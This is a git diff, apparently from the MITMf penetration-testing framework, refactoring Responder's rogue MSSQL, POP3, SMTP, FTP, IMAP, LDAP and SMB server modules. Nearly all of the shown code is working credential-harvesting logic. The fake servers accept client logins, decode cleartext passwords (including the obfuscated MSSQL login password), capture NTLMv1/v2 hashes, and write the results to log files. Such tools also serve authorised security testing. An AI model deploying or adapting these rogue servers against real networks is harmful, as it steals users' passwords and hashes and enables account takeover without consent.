for x in Pwd:
|
|
||||||
Pw.append(hex(x ^ 0xa5)[::-1][:2].replace("x","0").decode('hex'))
|
|
||||||
return ''.join(Pw)
|
|
||||||
|
|
||||||
def ParseClearTextSQLPass(Data,client):
|
|
||||||
outfile = "./logs/responder/MSSQL-PlainText-Password-"+client+".txt"
|
|
||||||
UsernameOffset = struct.unpack('<h',Data[48:50])[0]
|
|
||||||
PwdOffset = struct.unpack('<h',Data[52:54])[0]
|
|
||||||
AppOffset = struct.unpack('<h',Data[56:58])[0]
|
|
||||||
PwdLen = AppOffset-PwdOffset
|
|
||||||
UsernameLen = PwdOffset-UsernameOffset
|
|
||||||
PwdStr = ParseSqlClearTxtPwd(Data[8+PwdOffset:8+PwdOffset+PwdLen])
|
|
||||||
UserName = Data[8+UsernameOffset:8+UsernameOffset+UsernameLen].decode('utf-16le')
|
|
||||||
WriteData(outfile,UserName+":"+PwdStr,UserName+":"+PwdStr)
|
|
||||||
responder_logger.info('[+]MSSQL PlainText Password captured from :%s'%(client))
|
|
||||||
responder_logger.info('[+]MSSQL Username: %s Password: %s'%(UserName, PwdStr))
|
|
||||||
|
|
||||||
|
|
||||||
def ParsePreLoginEncValue(Data):
|
|
||||||
PacketLen = struct.unpack('>H',Data[2:4])[0]
|
|
||||||
EncryptionValue = Data[PacketLen-7:PacketLen-6]
|
|
||||||
if re.search("NTLMSSP",Data):
|
|
||||||
return True
|
|
||||||
else:
|
|
||||||
return False
|
|
||||||
|
|
||||||
#MS-SQL server class.
|
|
||||||
class MSSQL(BaseRequestHandler):
|
|
||||||
|
|
||||||
def handle(self):
|
|
||||||
try:
|
|
||||||
while True:
|
|
||||||
data = self.request.recv(1024)
|
|
||||||
self.request.settimeout(0.1)
|
|
||||||
##Pre-Login Message
|
|
||||||
if data[0] == "\x12":
|
|
||||||
buffer0 = str(MSSQLPreLoginAnswer())
|
|
||||||
self.request.send(buffer0)
|
|
||||||
data = self.request.recv(1024)
|
|
||||||
##NegoSSP
|
|
||||||
if data[0] == "\x10":
|
|
||||||
if re.search("NTLMSSP",data):
|
|
||||||
t = MSSQLNTLMChallengeAnswer(ServerChallenge=Challenge)
|
|
||||||
t.calculate()
|
|
||||||
buffer1 = str(t)
|
|
||||||
self.request.send(buffer1)
|
|
||||||
data = self.request.recv(1024)
|
|
||||||
else:
|
|
||||||
ParseClearTextSQLPass(data,self.client_address[0])
|
|
||||||
##NegoSSP Auth
|
|
||||||
if data[0] == "\x11":
|
|
||||||
ParseSQLHash(data,self.client_address[0])
|
|
||||||
except Exception:
|
|
||||||
pass
|
|
||||||
self.request.close()
|
|
||||||
##################################################################################
|
|
||||||
#SQL Stuff ends here
|
|
||||||
##################################################################################
|
|
|
@ -1,69 +0,0 @@
|
||||||
##################################################################################
|
|
||||||
#POP3 Stuff starts here
|
|
||||||
##################################################################################
|
|
||||||
|
|
||||||
class POP3Server():
|
|
||||||
|
|
||||||
def serve_thread_tcp(host, port, handler):
|
|
||||||
try:
|
|
||||||
server = ThreadingTCPServer((host, port), handler)
|
|
||||||
server.serve_forever()
|
|
||||||
except Exception, e:
|
|
||||||
print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
|
|
||||||
|
|
||||||
#Function name self-explanatory
|
|
||||||
def start(POP_On_Off):
|
|
||||||
if POP_On_Off == "ON":
|
|
||||||
t = threading.Thread(name="POP", target=serve_thread_tcp, args=("0.0.0.0", 110,POP))
|
|
||||||
t.setDaemon(True)
|
|
||||||
t.start()
|
|
||||||
return t
|
|
||||||
if POP_On_Off == "OFF":
|
|
||||||
return False
|
|
||||||
|
|
||||||
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
|
|
||||||
|
|
||||||
allow_reuse_address = 1
|
|
||||||
|
|
||||||
def server_bind(self):
|
|
||||||
TCPServer.server_bind(self)
|
|
||||||
|
|
||||||
|
|
||||||
class POPOKPacket(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Code", "+OK"),
|
|
||||||
("CRLF", "\r\n"),
|
|
||||||
])
|
|
||||||
|
|
||||||
#POP3 server class.
|
|
||||||
class POP(BaseRequestHandler):
|
|
||||||
|
|
||||||
def handle(self):
|
|
||||||
try:
|
|
||||||
self.request.send(str(POPOKPacket()))
|
|
||||||
data = self.request.recv(1024)
|
|
||||||
if data[0:4] == "USER":
|
|
||||||
User = data[5:].replace("\r\n","")
|
|
||||||
responder_logger.info('[+]POP3 User: %s'%(User))
|
|
||||||
t = POPOKPacket()
|
|
||||||
self.request.send(str(t))
|
|
||||||
data = self.request.recv(1024)
|
|
||||||
if data[0:4] == "PASS":
|
|
||||||
Pass = data[5:].replace("\r\n","")
|
|
||||||
Outfile = "./logs/responder/POP3-Clear-Text-Password-"+self.client_address[0]+".txt"
|
|
||||||
WriteData(Outfile,User+":"+Pass, User+":"+Pass)
|
|
||||||
#print "[+]POP3 Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],User,Pass)
|
|
||||||
responder_logger.info("[+]POP3 Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],User,Pass))
|
|
||||||
t = POPOKPacket()
|
|
||||||
self.request.send(str(t))
|
|
||||||
data = self.request.recv(1024)
|
|
||||||
else :
|
|
||||||
t = POPOKPacket()
|
|
||||||
self.request.send(str(t))
|
|
||||||
data = self.request.recv(1024)
|
|
||||||
except Exception:
|
|
||||||
pass
|
|
||||||
|
|
||||||
##################################################################################
|
|
||||||
#POP3 Stuff ends here
|
|
||||||
##################################################################################
|
|
|
@ -1,7 +1,8 @@
|
||||||
import logging
|
import logging
|
||||||
import sys
|
import sys
|
||||||
import threading
|
import threading
|
||||||
from impacket import smbserver, LOG
|
from impacket import version, smbserver, LOG
|
||||||
|
from core.configwatcher import ConfigWatcher
|
||||||
|
|
||||||
LOG.setLevel(logging.INFO)
|
LOG.setLevel(logging.INFO)
|
||||||
LOG.propagate = False
|
LOG.propagate = False
|
||||||
|
@ -16,11 +17,14 @@ streamHandler.setFormatter(formatter)
|
||||||
LOG.addHandler(fileHandler)
|
LOG.addHandler(fileHandler)
|
||||||
LOG.addHandler(streamHandler)
|
LOG.addHandler(streamHandler)
|
||||||
|
|
||||||
class SMBserver:
|
class SMBserver(ConfigWatcher):
|
||||||
|
|
||||||
|
impacket_ver = version.VER_MINOR
|
||||||
|
|
||||||
def __init__(self, listenAddress = '0.0.0.0', listenPort=445, configFile=''):
|
def __init__(self, listenAddress = '0.0.0.0', listenPort=445, configFile=''):
|
||||||
|
|
||||||
self.server = smbserver.SimpleSMBServer(listenAddress, listenPort, configFile)
|
self.server = smbserver.SimpleSMBServer(listenAddress, listenPort, configFile)
|
||||||
|
self.server.setSMBChallenge(self.config["MITMf"]["SMB"]["Challenge"])
|
||||||
|
|
||||||
def start(self):
|
def start(self):
|
||||||
t = threading.Thread(name='SMBserver', target=self.server.start)
|
t = threading.Thread(name='SMBserver', target=self.server.start)
|
||||||
|
|
|
@ -1,63 +0,0 @@
|
||||||
##################################################################################
|
|
||||||
#ESMTP Stuff starts here
|
|
||||||
##################################################################################
|
|
||||||
|
|
||||||
class SMTP():
|
|
||||||
|
|
||||||
def serve_thread_tcp(self, host, port, handler):
|
|
||||||
try:
|
|
||||||
server = ThreadingTCPServer((host, port), handler)
|
|
||||||
server.serve_forever()
|
|
||||||
except Exception, e:
|
|
||||||
print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
|
|
||||||
|
|
||||||
#Function name self-explanatory
|
|
||||||
def start(self, SMTP_On_Off):
|
|
||||||
if SMTP_On_Off == "ON":
|
|
||||||
t1 = threading.Thread(name="ESMTP-25", target=self.serve_thread_tcp, args=("0.0.0.0", 25,ESMTP))
|
|
||||||
t2 = threading.Thread(name="ESMTP-587", target=self.serve_thread_tcp, args=("0.0.0.0", 587,ESMTP))
|
|
||||||
|
|
||||||
for t in [t1, t2]:
|
|
||||||
t.setDaemon(True)
|
|
||||||
t.start()
|
|
||||||
|
|
||||||
if SMTP_On_Off == "OFF":
|
|
||||||
return False
|
|
||||||
|
|
||||||
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
|
|
||||||
|
|
||||||
allow_reuse_address = 1
|
|
||||||
|
|
||||||
def server_bind(self):
|
|
||||||
TCPServer.server_bind(self)
|
|
||||||
|
|
||||||
#ESMTP server class.
|
|
||||||
class ESMTP(BaseRequestHandler):
|
|
||||||
|
|
||||||
def handle(self):
|
|
||||||
try:
|
|
||||||
self.request.send(str(SMTPGreating()))
|
|
||||||
data = self.request.recv(1024)
|
|
||||||
if data[0:4] == "EHLO":
|
|
||||||
self.request.send(str(SMTPAUTH()))
|
|
||||||
data = self.request.recv(1024)
|
|
||||||
if data[0:4] == "AUTH":
|
|
||||||
self.request.send(str(SMTPAUTH1()))
|
|
||||||
data = self.request.recv(1024)
|
|
||||||
if data:
|
|
||||||
Username = b64decode(data[:len(data)-2])
|
|
||||||
self.request.send(str(SMTPAUTH2()))
|
|
||||||
data = self.request.recv(1024)
|
|
||||||
if data:
|
|
||||||
Password = b64decode(data[:len(data)-2])
|
|
||||||
Outfile = "./logs/responder/SMTP-Clear-Text-Password-"+self.client_address[0]+".txt"
|
|
||||||
WriteData(Outfile,Username+":"+Password, Username+":"+Password)
|
|
||||||
#print "[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password)
|
|
||||||
responder_logger.info("[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password))
|
|
||||||
|
|
||||||
except Exception:
|
|
||||||
pass
|
|
||||||
|
|
||||||
##################################################################################
|
|
||||||
#ESMTP Stuff ends here
|
|
||||||
##################################################################################
|
|
|
@ -1,6 +1,6 @@
|
||||||
#common functions that are used throughout the Responder's code
|
#common functions that are used throughout the Responder's code
|
||||||
|
|
||||||
|
import os
|
||||||
import re
|
import re
|
||||||
|
|
||||||
#Function used to write captured hashs to a file.
|
#Function used to write captured hashs to a file.
|
||||||
|
|
|
@ -1,25 +1,25 @@
|
||||||
##################################################################################
|
import socket
|
||||||
#FTP Stuff starts here
|
import threading
|
||||||
##################################################################################
|
import logging
|
||||||
|
|
||||||
|
from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler
|
||||||
|
from core.responder.packet import Packet
|
||||||
|
from core.responder.odict import OrderedDict
|
||||||
|
from core.responder.common import *
|
||||||
|
|
||||||
|
mitmf_logger = logging.getLogger("mitmf")
|
||||||
|
|
||||||
class FTPServer():
|
class FTPServer():
|
||||||
|
|
||||||
def serve_thread_tcp(host, port, handler):
|
def start(self):
|
||||||
try:
|
try:
|
||||||
server = ThreadingTCPServer((host, port), handler)
|
mitmf_logger.debug("[FTPServer] online")
|
||||||
server.serve_forever()
|
server = ThreadingTCPServer(("0.0.0.0", 21), FTP)
|
||||||
except Exception, e:
|
t = threading.Thread(name="FTPServer", target=server.serve_forever)
|
||||||
print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
|
|
||||||
|
|
||||||
#Function name self-explanatory
|
|
||||||
def start(FTP_On_Off):
|
|
||||||
if FTP_On_Off == "ON":
|
|
||||||
t = threading.Thread(name="FTP", target=self.serve_thread_tcp, args=("0.0.0.0", 21, FTP))
|
|
||||||
t.setDaemon(True)
|
t.setDaemon(True)
|
||||||
t.start()
|
t.start()
|
||||||
|
except Exception, e:
|
||||||
if FTP_On_Off == "OFF":
|
mitmf_logger.error("[FTPServer] Error starting on port {}: {}".format(21, e))
|
||||||
return False
|
|
||||||
|
|
||||||
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
|
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
|
||||||
|
|
||||||
|
@ -45,8 +45,7 @@ class FTP(BaseRequestHandler):
|
||||||
data = self.request.recv(1024)
|
data = self.request.recv(1024)
|
||||||
if data[0:4] == "USER":
|
if data[0:4] == "USER":
|
||||||
User = data[5:].replace("\r\n","")
|
User = data[5:].replace("\r\n","")
|
||||||
#print "[+]FTP User: ", User
|
mitmf_logger.info('[FTPServer] {} FTP User: {}'.format(self.client_address[0], User))
|
||||||
responder_logger.info('[+]FTP User: %s'%(User))
|
|
||||||
t = FTPPacket(Code="331",Message="User name okay, need password.")
|
t = FTPPacket(Code="331",Message="User name okay, need password.")
|
||||||
self.request.send(str(t))
|
self.request.send(str(t))
|
||||||
data = self.request.recv(1024)
|
data = self.request.recv(1024)
|
||||||
|
@ -54,8 +53,7 @@ class FTP(BaseRequestHandler):
|
||||||
Pass = data[5:].replace("\r\n","")
|
Pass = data[5:].replace("\r\n","")
|
||||||
Outfile = "./logs/responder/FTP-Clear-Text-Password-"+self.client_address[0]+".txt"
|
Outfile = "./logs/responder/FTP-Clear-Text-Password-"+self.client_address[0]+".txt"
|
||||||
WriteData(Outfile,User+":"+Pass, User+":"+Pass)
|
WriteData(Outfile,User+":"+Pass, User+":"+Pass)
|
||||||
#print "[+]FTP Password is: ", Pass
|
mitmf_logger.info('[FTPServer] {} FTP Password is: {}'.format(self.client_address[0], Pass))
|
||||||
responder_logger.info('[+]FTP Password is: %s'%(Pass))
|
|
||||||
t = FTPPacket(Code="530",Message="User not logged in.")
|
t = FTPPacket(Code="530",Message="User not logged in.")
|
||||||
self.request.send(str(t))
|
self.request.send(str(t))
|
||||||
data = self.request.recv(1024)
|
data = self.request.recv(1024)
|
||||||
|
@ -63,9 +61,5 @@ class FTP(BaseRequestHandler):
|
||||||
t = FTPPacket(Code="502",Message="Command not implemented.")
|
t = FTPPacket(Code="502",Message="Command not implemented.")
|
||||||
self.request.send(str(t))
|
self.request.send(str(t))
|
||||||
data = self.request.recv(1024)
|
data = self.request.recv(1024)
|
||||||
except Exception:
|
except Exception as e:
|
||||||
pass
|
mitmf_logger.error("[FTPServer] Error handling request: {}".format(e))
|
||||||
|
|
||||||
##################################################################################
|
|
||||||
#FTP Stuff ends here
|
|
||||||
##################################################################################
|
|
|
@ -16,21 +16,8 @@
|
||||||
# You should have received a copy of the GNU General Public License
|
# You should have received a copy of the GNU General Public License
|
||||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
import struct
|
import struct
|
||||||
from odict import OrderedDict
|
from core.responder.odict import OrderedDict
|
||||||
|
from core.responder.packet import Packet
|
||||||
class Packet():
|
|
||||||
fields = OrderedDict([
|
|
||||||
("data", ""),
|
|
||||||
])
|
|
||||||
def __init__(self, **kw):
|
|
||||||
self.fields = OrderedDict(self.__class__.fields)
|
|
||||||
for k,v in kw.items():
|
|
||||||
if callable(v):
|
|
||||||
self.fields[k] = v(self.fields[k])
|
|
||||||
else:
|
|
||||||
self.fields[k] = v
|
|
||||||
def __str__(self):
|
|
||||||
return "".join(map(str, self.fields.values()))
|
|
||||||
|
|
||||||
#IMAP4 Greating class
|
#IMAP4 Greating class
|
||||||
class IMAPGreating(Packet):
|
class IMAPGreating(Packet):
|
|
@ -1,26 +1,23 @@
|
||||||
##################################################################################
|
import logging
|
||||||
#IMAP4 Stuff starts here
|
import threading
|
||||||
##################################################################################
|
|
||||||
|
|
||||||
|
from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler
|
||||||
|
from IMAPPackets import *
|
||||||
|
from core.responder.common import *
|
||||||
|
|
||||||
|
mitmf_logger = logging.getLogger("mitmf")
|
||||||
|
|
||||||
class IMAPServer():
|
class IMAPServer():
|
||||||
|
|
||||||
def serve_thread_tcp(host, port, handler):
|
def start(self):
|
||||||
try:
|
try:
|
||||||
server = ThreadingTCPServer((host, port), handler)
|
mitmf_logger.debug("[IMAPServer] online")
|
||||||
server.serve_forever()
|
server = ThreadingTCPServer(("0.0.0.0", 143), IMAP)
|
||||||
except Exception, e:
|
t = threading.Thread(name="IMAPServer", target=server.serve_forever)
|
||||||
print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
|
|
||||||
|
|
||||||
#Function name self-explanatory
|
|
||||||
def start(IMAP_On_Off):
|
|
||||||
if IMAP_On_Off == "ON":
|
|
||||||
t = threading.Thread(name="IMAP", target=self.serve_thread_tcp, args=("0.0.0.0", 143,IMAP))
|
|
||||||
t.setDaemon(True)
|
t.setDaemon(True)
|
||||||
t.start()
|
t.start()
|
||||||
|
except Exception, e:
|
||||||
if IMAP_On_Off == "OFF":
|
mitmf_logger.error("[IMAPServer] Error starting on port {}: {}".format(143, e))
|
||||||
return False
|
|
||||||
|
|
||||||
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
|
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
|
||||||
|
|
||||||
|
@ -46,13 +43,9 @@ class IMAP(BaseRequestHandler):
|
||||||
Outfile = "./logs/responder/IMAP-Clear-Text-Password-"+self.client_address[0]+".txt"
|
Outfile = "./logs/responder/IMAP-Clear-Text-Password-"+self.client_address[0]+".txt"
|
||||||
WriteData(Outfile,Credentials, Credentials)
|
WriteData(Outfile,Credentials, Credentials)
|
||||||
#print '[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials)
|
#print '[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials)
|
||||||
responder_logger.info('[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials))
|
mitmf_logger.info('[IMAPServer] IMAP Credentials from {}. ("User" "Pass"): {}'.format(self.client_address[0],Credentials))
|
||||||
self.request.send(str(ditchthisconnection()))
|
self.request.send(str(ditchthisconnection()))
|
||||||
data = self.request.recv(1024)
|
data = self.request.recv(1024)
|
||||||
|
|
||||||
except Exception:
|
except Exception as e:
|
||||||
pass
|
mitmf_logger.error("[IMAPServer] Error handling request: {}".format(e))
|
||||||
|
|
||||||
##################################################################################
|
|
||||||
#IMAP4 Stuff ends here
|
|
||||||
##################################################################################
|
|
|
@ -17,22 +17,8 @@
|
||||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
|
||||||
import struct
|
import struct
|
||||||
from odict import OrderedDict
|
from core.responder.odict import OrderedDict
|
||||||
|
from core.responder.packet import Packet
|
||||||
class Packet():
|
|
||||||
fields = OrderedDict([
|
|
||||||
("data", ""),
|
|
||||||
])
|
|
||||||
def __init__(self, **kw):
|
|
||||||
self.fields = OrderedDict(self.__class__.fields)
|
|
||||||
for k,v in kw.items():
|
|
||||||
if callable(v):
|
|
||||||
self.fields[k] = v(self.fields[k])
|
|
||||||
else:
|
|
||||||
self.fields[k] = v
|
|
||||||
def __str__(self):
|
|
||||||
return "".join(map(str, self.fields.values()))
|
|
||||||
|
|
||||||
|
|
||||||
class LDAPSearchDefaultPacket(Packet):
|
class LDAPSearchDefaultPacket(Packet):
|
||||||
fields = OrderedDict([
|
fields = OrderedDict([
|
|
@ -1,25 +1,27 @@
|
||||||
##################################################################################
|
import struct
|
||||||
#LDAP Stuff starts here
|
import logging
|
||||||
##################################################################################
|
import threading
|
||||||
|
import re
|
||||||
|
|
||||||
|
from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler
|
||||||
|
from LDAPPackets import *
|
||||||
|
from core.responder.common import *
|
||||||
|
|
||||||
|
mitmf_logger = logging.getLogger("mitmf")
|
||||||
|
|
||||||
class LDAPServer():
|
class LDAPServer():
|
||||||
|
|
||||||
def serve_thread_tcp(self, host, port, handler):
|
def start(self, chal):
|
||||||
try:
|
global Challenge; Challenge = chal
|
||||||
server = ThreadingTCPServer((host, port), handler)
|
|
||||||
server.serve_forever()
|
|
||||||
except Exception, e:
|
|
||||||
print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
|
|
||||||
|
|
||||||
#Function name self-explanatory
|
try:
|
||||||
def start(self, LDAP_On_Off):
|
mitmf_logger.debug("[LDAPServer] online")
|
||||||
if LDAP_On_Off == "ON":
|
server = ThreadingTCPServer(("0.0.0.0", 389), LDAP)
|
||||||
t = threading.Thread(name="LDAP", target=self.serve_thread_tcp, args=("0.0.0.0", 389,LDAP))
|
t = threading.Thread(name="LDAPServer", target=server.serve_forever)
|
||||||
t.setDaemon(True)
|
t.setDaemon(True)
|
||||||
t.start()
|
t.start()
|
||||||
|
except Exception, e:
|
||||||
if LDAP_On_Off == "OFF":
|
mitmf_logger.error("[LDAPServer] Error starting on port {}: {}".format(389, e))
|
||||||
return False
|
|
||||||
|
|
||||||
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
|
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
|
||||||
|
|
||||||
|
@ -54,15 +56,15 @@ def ParseLDAPHash(data,client):
|
||||||
UserLen = struct.unpack('<H',data[80:82])[0]
|
UserLen = struct.unpack('<H',data[80:82])[0]
|
||||||
UserOffset = struct.unpack('<H',data[82:84])[0]
|
UserOffset = struct.unpack('<H',data[82:84])[0]
|
||||||
User = SSPIStarts[UserOffset:UserOffset+UserLen].replace('\x00','')
|
User = SSPIStarts[UserOffset:UserOffset+UserLen].replace('\x00','')
|
||||||
writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal
|
writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+Challenge
|
||||||
Outfile = "./logs/responder/LDAP-NTLMv1-"+client+".txt"
|
Outfile = "./logs/responder/LDAP-NTLMv1-"+client+".txt"
|
||||||
WriteData(Outfile,writehash,User+"::"+Domain)
|
WriteData(Outfile,writehash,User+"::"+Domain)
|
||||||
#print "[LDAP] NTLMv1 complete hash is :", writehash
|
#print "[LDAP] NTLMv1 complete hash is :", writehash
|
||||||
responder_logger.info('[LDAP] NTLMv1 complete hash is :%s'%(writehash))
|
mitmf_logger.info('[LDAP] NTLMv1 complete hash is :%s'%(writehash))
|
||||||
if LMhashLen <2 :
|
if LMhashLen <2 :
|
||||||
Message = '[+]LDAP Anonymous NTLM authentication, ignoring..'
|
Message = '[LDAPServer] LDAP Anonymous NTLM authentication, ignoring..'
|
||||||
#print Message
|
#print Message
|
||||||
responder_logger.info(Message)
|
mitmf_logger.info(Message)
|
||||||
|
|
||||||
def ParseNTLM(data,client):
|
def ParseNTLM(data,client):
|
||||||
Search1 = re.search('(NTLMSSP\x00\x01\x00\x00\x00)', data)
|
Search1 = re.search('(NTLMSSP\x00\x01\x00\x00\x00)', data)
|
||||||
|
@ -91,8 +93,8 @@ def ParseLDAPPacket(data,client):
|
||||||
Password = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen]
|
Password = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen]
|
||||||
#print '[LDAP]Clear Text User & Password is:', UserDomain+":"+Password
|
#print '[LDAP]Clear Text User & Password is:', UserDomain+":"+Password
|
||||||
outfile = "./logs/responder/LDAP-Clear-Text-Password-"+client+".txt"
|
outfile = "./logs/responder/LDAP-Clear-Text-Password-"+client+".txt"
|
||||||
WriteData(outfile,'[LDAP]User: %s Password: %s'%(UserDomain,Password),'[LDAP]User: %s Password: %s'%(UserDomain,Password))
|
WriteData(outfile,'[LDAPServer] User: %s Password: %s'%(UserDomain,Password),'[LDAP]User: %s Password: %s'%(UserDomain,Password))
|
||||||
responder_logger.info('[LDAP]User: %s Password: %s'%(UserDomain,Password))
|
mitmf_logger.info('[LDAPServer] User: %s Password: %s'%(UserDomain,Password))
|
||||||
if sasl == "\xA3":
|
if sasl == "\xA3":
|
||||||
buff = ParseNTLM(data,client)
|
buff = ParseNTLM(data,client)
|
||||||
return buff
|
return buff
|
||||||
|
@ -100,7 +102,7 @@ def ParseLDAPPacket(data,client):
|
||||||
buff = ParseSearch(data)
|
buff = ParseSearch(data)
|
||||||
return buff
|
return buff
|
||||||
else:
|
else:
|
||||||
responder_logger.info('[LDAP]Operation not supported')
|
mitmf_logger.info('[LDAPServer] Operation not supported')
|
||||||
|
|
||||||
#LDAP Server Class
|
#LDAP Server Class
|
||||||
class LDAP(BaseRequestHandler):
|
class LDAP(BaseRequestHandler):
|
||||||
|
@ -115,7 +117,3 @@ class LDAP(BaseRequestHandler):
|
||||||
self.request.send(buffer0)
|
self.request.send(buffer0)
|
||||||
except Exception:
|
except Exception:
|
||||||
pass #No need to print timeout errors.
|
pass #No need to print timeout errors.
|
||||||
|
|
||||||
##################################################################################
|
|
||||||
#LDAP Stuff ends here
|
|
||||||
##################################################################################
|
|
|
@ -16,21 +16,8 @@
|
||||||
# You should have received a copy of the GNU General Public License
|
# You should have received a copy of the GNU General Public License
|
||||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
import struct
|
import struct
|
||||||
from odict import OrderedDict
|
from core.responder.odict import OrderedDict
|
||||||
|
from core.responder.packet import Packet
|
||||||
class Packet():
|
|
||||||
fields = OrderedDict([
|
|
||||||
("data", ""),
|
|
||||||
])
|
|
||||||
def __init__(self, **kw):
|
|
||||||
self.fields = OrderedDict(self.__class__.fields)
|
|
||||||
for k,v in kw.items():
|
|
||||||
if callable(v):
|
|
||||||
self.fields[k] = v(self.fields[k])
|
|
||||||
else:
|
|
||||||
self.fields[k] = v
|
|
||||||
def __str__(self):
|
|
||||||
return "".join(map(str, self.fields.values()))
|
|
||||||
|
|
||||||
#MS-SQL Pre-login packet class
|
#MS-SQL Pre-login packet class
|
||||||
class MSSQLPreLoginAnswer(Packet):
|
class MSSQLPreLoginAnswer(Packet):
|
127
core/responder/mssql/MSSQLServer.py
Normal file
127
core/responder/mssql/MSSQLServer.py
Normal file
|
@ -0,0 +1,127 @@
|
||||||
|
import struct
|
||||||
|
import logging
|
||||||
|
import threading
|
||||||
|
|
||||||
|
from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler
|
||||||
|
from MSSQLPackets import *
|
||||||
|
from core.responder.common import *
|
||||||
|
|
||||||
|
mitmf_logger = logging.getLogger("mitmf")
|
||||||
|
|
||||||
|
class MSSQLServer():
|
||||||
|
|
||||||
|
def start(self, chal):
|
||||||
|
global Challenge; Challenge = chal
|
||||||
|
|
||||||
|
try:
|
||||||
|
mitmf_logger.debug("[MSSQLServer] online")
|
||||||
|
server = ThreadingTCPServer(("0.0.0.0", 1433), MSSQL)
|
||||||
|
t = threading.Thread(name="MSSQLServer", target=server.serve_forever)
|
||||||
|
t.setDaemon(True)
|
||||||
|
t.start()
|
||||||
|
except Exception, e:
|
||||||
|
mitmf_logger.error("[MSSQLServer] Error starting on port {}: {}".format(1433, e))
|
||||||
|
|
||||||
|
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
|
||||||
|
|
||||||
|
allow_reuse_address = True
|
||||||
|
|
||||||
|
def server_bind(self):
|
||||||
|
TCPServer.server_bind(self)
|
||||||
|
|
||||||
|
#This function parse SQL NTLMv1/v2 hash and dump it into a specific file.
|
||||||
|
def ParseSQLHash(data,client):
|
||||||
|
SSPIStart = data[8:]
|
||||||
|
LMhashLen = struct.unpack('<H',data[20:22])[0]
|
||||||
|
LMhashOffset = struct.unpack('<H',data[24:26])[0]
|
||||||
|
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
|
||||||
|
NthashLen = struct.unpack('<H',data[30:32])[0]
|
||||||
|
if NthashLen == 24:
|
||||||
|
NthashOffset = struct.unpack('<H',data[32:34])[0]
|
||||||
|
NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
||||||
|
DomainLen = struct.unpack('<H',data[36:38])[0]
|
||||||
|
DomainOffset = struct.unpack('<H',data[40:42])[0]
|
||||||
|
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
|
||||||
|
UserLen = struct.unpack('<H',data[44:46])[0]
|
||||||
|
UserOffset = struct.unpack('<H',data[48:50])[0]
|
||||||
|
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
|
||||||
|
outfile = "./logs/responder/MSSQL-NTLMv1-Client-"+client+".txt"
|
||||||
|
WriteData(outfile,User+"::"+Domain+":"+LMHash+":"+NtHash+":"+Challenge, User+"::"+Domain)
|
||||||
|
mitmf_logger.info('[MSSQLServer] MsSQL NTLMv1 hash captured from :{}'.format(client))
|
||||||
|
mitmf_logger.info('[MSSQLServer] MSSQL NTLMv1 User is :{}'.format(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')))
|
||||||
|
mitmf_logger.info('[MSSQLServer] MSSQL NTLMv1 Domain is :{}'.format(Domain))
|
||||||
|
mitmf_logger.info('[MSSQLServer] MSSQL NTLMv1 Complete hash is: {}'.format(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+Challenge))
|
||||||
|
if NthashLen > 60:
|
||||||
|
DomainLen = struct.unpack('<H',data[36:38])[0]
|
||||||
|
NthashOffset = struct.unpack('<H',data[32:34])[0]
|
||||||
|
NthashLen = struct.unpack('<H',data[30:32])[0]
|
||||||
|
Hash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
|
||||||
|
DomainOffset = struct.unpack('<H',data[40:42])[0]
|
||||||
|
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
|
||||||
|
UserLen = struct.unpack('<H',data[44:46])[0]
|
||||||
|
UserOffset = struct.unpack('<H',data[48:50])[0]
|
||||||
|
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
|
||||||
|
outfile = "./logs/responder/MSSQL-NTLMv2-Client-"+client+".txt"
|
||||||
|
Writehash = User+"::"+Domain+":"+Challenge+":"+Hash[:32].upper()+":"+Hash[32:].upper()
|
||||||
|
WriteData(outfile,Writehash,User+"::"+Domain)
|
||||||
|
mitmf_logger.info('[MSSQLServer] MSSQL NTLMv2 hash captured from {}'.format(client))
|
||||||
|
mitmf_logger.info('[MSSQLServer] MSSQL NTLMv2 Domain is: {}'.format(Domain))
|
||||||
|
